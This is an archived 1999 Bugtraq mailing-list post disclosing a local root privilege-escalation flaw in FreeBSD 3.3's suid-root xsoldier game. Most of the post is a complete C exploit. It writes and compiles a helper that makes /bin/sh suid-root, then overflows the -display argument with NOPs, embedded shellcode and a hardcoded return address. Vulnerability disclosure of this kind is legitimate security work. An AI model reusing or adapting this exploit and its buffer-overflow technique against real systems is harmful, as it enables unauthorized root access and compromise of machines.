Archive : 1999 : december : xsoldier - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku
FreeBSD 3.3 xsoldier root exploit



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Ср, 15 дек 1999  20:11:36

   От: Brock Tellier <btellier@USA.NET>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: FreeBSD 3.3 xsoldier root exploit

--------------------------------------------------------------------------------




Greetings,



OVERVIEW

A vulnerability in FreeBSD 3.3's xsoldier will allow any user to gain root

access.  This user does not have to have a valid $DISPLAY to exploit this.



BACKGROUND

Only FreeBSD 3.3-RELEASE has been tested.  xsoldier, suid-root by default, was

installed as part of the X11 games packages via /stand/sysinstall.



DETAILS

More problems with FreeBSD 3.3 ports.  This time with xsoldier, a suid-root

game.  A simple overflow in the -display option allows any user to gain root. 

Although xsoldier only runs under X, a long -display arg on the CL will allow

us to gain root.



--- xsoldierx.c ---

/* 

 * xsoldier exploit for Freebsd-3.3-RELEASE

 * Drops a suid root shell in /bin/sh

 * Brock Tellier btellier@usa.net

 */





#include <stdio.h>



char shell[]= /* mudge@l0pht.com */

  "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"

   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"

   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"

   "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";



#define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"



void buildui() {

FILE *fp;

  char cc[100];

  fp = fopen("/tmp/ui.c", "w");

  fprintf(fp, CODE);

  fclose(fp);

  snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");

  system(cc);

}



main (int argc, char *argv[] ) {

 int x = 0;

 int y = 0;

 int offset = 0;

 int bsize = 4400;

 char buf[bsize];

 int eip = 0xbfbfdb65; /* works for me */

 buildui();



 if (argv[1]) { 

   offset = atoi(argv[1]);

   eip = eip + offset;

 }

 fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE

<btellier@usa.net>\n");

 fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");

 fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);

 

 for ( x = 0; x < 4325; x++) buf[x] = 0x90;

     fprintf(stderr, "NOPs to %d\n", x);

 

 for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];

     fprintf(stderr, "Shellcode to %d\n",x);

  

  buf[x++] =  eip & 0x000000ff;

  buf[x++] = (eip & 0x0000ff00) >> 8;

  buf[x++] = (eip & 0x00ff0000) >> 16;

  buf[x++] = (eip & 0xff000000) >> 24;

     fprintf(stderr, "eip to %d\n",x);



 buf[bsize]='\0';



execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);



}



-------



Brock Tellier

UNIX Systems Administrator

Chicago, IL, USA

btellier@usa.net



____________________________________________________________________

Get free email and a permanent address at http://www.netaddress.com/?N=1
test server